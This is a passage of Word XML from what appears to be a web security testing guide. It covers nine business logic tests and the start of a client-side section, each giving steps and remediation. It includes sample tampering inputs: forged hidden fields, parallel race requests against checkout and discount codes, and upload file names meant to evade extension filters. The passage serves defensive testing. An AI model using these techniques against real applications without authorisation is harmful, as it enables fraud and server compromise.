      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Business Logic Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Business logic testing looks beyond technical injection flaws to the application's intended workflow rules — testing whether an attacker can manipulate legitimate functionality in unintended sequences, volumes, or timings to gain improper advantage. These flaws are highly application-specific and generally require manual analysis rather than automated scanning.</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3200"/>
        <w:gridCol w:w="6600"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Category Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">BUSLOGIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Number of Test Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test ID Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OTG-BUSLOGIC-001 – OTG-BUSLOGIC-009</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-BUSLOGIC-001  —  Test Business Logic Data Validation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the application properly validates that data is not just well-formed, but logically valid within the business context, at every hand-off point between systems.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Map every data entry point and hand-off between systems/components in the workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Submit data that is technically well-formed but logically invalid (e.g., a negative quantity, a future date-of-birth, a discount greater than 100%).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Observe whether the business logic layer catches and rejects the logically invalid data.</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(Manual, workflow-specific — e.g., POST quantity=-5 to a shopping cart endpoint)</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Implement explicit business-rule validation (range checks, logical consistency checks) at every server-side hand-off point, not only format/type validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-BUSLOGIC-002  —  Test Ability to Forge Requests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guessable, predictable, or hidden functionality/fields can be manipulated to push the workflow through the system against its normal, intended path.</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Identify hidden fields, predictable parameter names, or undocumented functionality within the workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to insert logically valid — but workflow-inappropriate — data to skip past intended checks.</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(Manual — e.g., directly submitting a hidden 'orderStatus=approved' field that the UI never exposes to the user)</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Do not rely on hidden fields or obscurity to protect workflow integrity; enforce state transitions server-side.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-BUSLOGIC-003  —  Test Integrity Checks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components that move, store, or handle data (inputs, databases, logs) properly restrict who — per business logic — may insert, update, or delete each piece of data.</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Identify each data-handling component and the data types it should logically accept or reject.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine, per the business logic, which roles should be permitted to insert/update/delete each data element.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt insert/update/delete operations as a role that should not be permitted to perform them, per the defined business logic (distinct from pure technical authorization testing).</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(Manual, workflow and role-specific testing against each data-handling component)</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Apply integrity checks and role-appropriate restrictions at each identified hand-off/component, not only at the outermost API layer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-BUSLOGIC-004  —  Test for Process Timing</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functionality is impacted by timing in a way an attacker can exploit — e.g., predicting outcomes or circumventing workflow steps by manipulating execution timing.</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Identify functionality where timing matters (auctions, time-limited offers, race conditions on limited resources).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Develop misuse cases exploiting timing (e.g., submitting an action right at a deadline boundary, or racing two concurrent requests against a shared resource).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute the misuse case and verify whether the attacker gains an unintended advantage.</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(Burp Turbo Intruder / Repeater 'send group in parallel') fire two simultaneous requests against a limited-stock checkout endpoint</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Use atomic, transactional operations for any timing- or concurrency-sensitive business logic (e.g., row-level locking on inventory decrements).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Do not rely on client-observable timing as a trust boundary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-BUSLOGIC-005  —  Test Number of Times a Function Can Be Used Limits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functions intended to execute only once (or a limited number of times) per user/workflow can be abused to execute more than that limit.</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Identify functions with an intended single-use or limited-use constraint (e.g., a one-time discount code, a single vote).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to invoke the function repeatedly beyond its intended limit, including via replaying captured requests and via race conditions (parallel submission).</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(Burp Repeater / Intruder) replay the same discount-code redemption request multiple times, including in rapid parallel succession</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Enforce usage limits with atomic, server-side, transactional checks (not simple read-then-write logic vulnerable to race conditions).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Explicitly test limit-enforcing logic against concurrent/parallel requests, not only sequential ones.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-BUSLOGIC-006  —  Testing for the Circumvention of Work Flows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workflow steps can be skipped or performed out of the designed/intended order.</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Map the full intended step sequence of the target workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to invoke a later step directly, bypassing earlier required steps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Develop a misuse case for each identified skip-path and verify whether the application allows the out-of-order action to complete.</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(Manual — directly request the 'confirm order' endpoint without having first completed the 'add payment method' step)</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Track and validate workflow state server-side, and reject any step invoked out of its required sequence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-BUSLOGIC-007  —  Test Defenses Against Application Mis-use</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the application has effective self-defense measures against abusive/automated misuse — e.g., changed responses, blocked requests, or account lockout triggered by anomalous behavior.</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Perform sustained rapid or repetitive requests against sensitive functionality and observe whether the application detects and responds (throttling, CAPTCHA, blocking, logout).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Assess whether such defenses can themselves be bypassed (e.g., by rotating IP/user-agent).</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(Burp Intruder) sustained request flood against a sensitive endpoint, observing for rate-limiting or blocking responses</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Implement anomaly-based rate limiting and abuse detection on sensitive business functions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Regularly test that abuse-defense mechanisms cannot be trivially evaded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-BUSLOGIC-008  —  Test Upload of Unexpected File Types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the file upload functionality properly rejects file types that should be unsupported, including files that masquerade as an allowed type.</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Review documentation/UI to determine which file types are meant to be supported.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to upload files of unsupported types, including disguised extensions and double extensions (e.g., file.phtml, shell.phPWND, SHELL~1.PHP) designed to evade naive extension filters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If multiple files can be uploaded together, verify each is independently and correctly evaluated.</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(Manual — attempt upload of a renamed executable/script disguised with an allowed extension pattern)</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Validate file type by content (magic-byte/MIME inspection), not solely by extension.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Store uploaded files outside the web root, or serve them with a non-executable content-disposition/MIME type.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply this validation independently to every file in a multi-file upload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-BUSLOGIC-009  —  Test Upload of Malicious Files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the application correctly detects and rejects a known-malicious file uploaded through legitimate functionality.</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Obtain or construct a benign EICAR test file (a standardized, harmless string recognized by AV engines as a test signature) or an equivalent known-malicious sample in an authorized lab context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attempt to upload the file and verify it is correctly detected/rejected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">If multiple files can be uploaded together, verify each is independently scanned.</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(Use the EICAR standard antivirus test string for a safe, non-destructive malicious-file-detection test)</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Integrate malware/AV scanning into the file upload pipeline before the file is stored or made accessible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply scanning independently to every file in a multi-file upload, and re-scan periodically as signature databases update.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId29"/>
          <w:footerReference w:type="default" r:id="rId30"/>
          <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
          <w:pgMar w:top="1350" w:right="1350" w:bottom="1350" w:left="1350" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CATEGORY 11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Client Side Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Client-side testing focuses on vulnerabilities that execute or manifest within the victim's browser — DOM-based XSS, JavaScript/HTML/CSS injection, open redirects, resource manipulation, CORS misconfiguration, Flash/legacy plugin issues, clickjacking, WebSocket security, Web Messaging, and browser storage misuse.</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3200"/>
        <w:gridCol w:w="6600"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Category Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CLIENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Number of Test Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Test ID Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OTG-CLIENT-001 – OTG-CLIENT-012</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="90" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG-CLIENT-001  —  Testing for DOM based Cross Site Scripting</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DOMinator, browser DevTools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Determine whether client-side JavaScript takes data from an untrusted source (URL fragment, document.referrer, window.name) and writes it to a dangerous DOM sink (innerHTML, document.write) without sanitization, entirely within the browser with no server round-trip.</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Review client-side JavaScript for the use of untrusted sources (location.hash, location.search, document.referrer, postMessage data) flowing into dangerous sinks (innerHTML, eval, document.write).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
